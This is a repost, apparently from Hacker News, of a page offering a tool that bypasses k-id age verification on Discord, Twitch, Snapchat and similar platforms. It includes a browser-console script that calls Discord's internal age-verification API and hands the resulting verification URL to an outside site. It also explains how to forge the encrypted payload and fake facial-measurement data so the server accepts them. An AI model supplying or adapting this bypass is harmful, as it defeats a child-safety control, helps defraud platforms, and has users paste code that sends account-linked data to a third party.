Discord/Twitch/Snapchat age verification bypass

Source: Hacker News

age verifies your account automatically as an adult on any website using k‑id.

Made by xyzeva and Dziurwa; greetz to amplitudes for previous work.

How to verify on Discord

It works regardless of your region (e.g., the UK). The script will verify your account for the upcoming global rollout in March as well as the current verification.

1. Open Discord in a browser: .
2. Press F12, go to the Console tab.
3. Paste the script below, press Enter, and solve the captcha that appears (type “allow pasting” first if necessary).

// add a chunk to get all of the webpack chunks
_mods = webpackChunkdiscord_app.push([[Symbol()],{},r=>r.c]);
webpackChunkdiscord_app.pop(); // cleanup the chunk we added

// utility to find a webpack chunk by property
findByProps = (...props) => {
    for (let m of Object.values(_mods)) {
        try {
            if (!m.exports || m.exports === window) continue;
            if (props.every(x => m.exports?.[x])) return m.exports;

            for (let ex in m.exports) {
                if (props.every(x => m.exports?.[ex]?.[x]) &&
                    m.exports[ex][Symbol.toStringTag] !== 'IntlMessagesProxy')
                    return m.exports[ex];
            }
        } catch {}
    }
}

// find the discord api client
api = findByProps('Bo','oh').Bo

// send an API request to Discord /age-verification/verify and then redirect the page to our website
window.location.href = `https://age-verifier.kibty.town/webview?url=${encodeURIComponent(
    (await api.post({ url: '/age-verification/verify', body: { method: 3 } })).body.verification_webview_url
)}`;

The script will redirect you to a verification page. Wait until it reports success – your Discord account is now age‑verified.

How to verify on other platforms (Twitch, Kick, Snapchat, …)

1. Navigate to the platform’s age‑verification page and choose the selfie option.
2. Capture the QR‑code URL that appears.
3. Paste that URL into the provided input box on the verifier site and press Verify.

How does this work

k‑id, the provider Discord uses, does not store or transmit your actual face. Instead, it sends metadata about the facial scan and the verification process. This protects privacy compared to providers that upload raw video footage, but it also means that forged metadata can be accepted if it looks legitimate.

After the release of amplitudes’ k‑id verifier, the partner for face verification (FaceAssure) hardened the system, rendering the original bypass ineffective. With Discord’s decision to make age verification global, a new approach was needed.

Step 1: encrypted_payload and auth_tag

The old implementation omitted encrypted_payload, auth_tag, timestamp, and iv in the request body. The payload is encrypted with AES‑GCM, using a key derived from nonce + timestamp + transaction_id via HKDF‑SHA256. Replicating this process allows us to generate the missing parameters.

Step 2: Prediction data

Even with correct encryption, verification still fails because the server validates the prediction arrays: outputs, primaryOutputs, and raws.

• raws contain the raw facial measurements.
• primaryOutputs are derived from raws after a single z‑score outlier removal.
• outputs undergo a second outlier removal.

Additional checks include:

• xScaledShiftAmt and yScaledShiftAmt are limited to two possible values.
• The media name (camera) must match one of the devices listed in the client’s device array.
• State completion times must align with the expected timeline.

All the code used for this bypass is open‑source and available on GitHub: .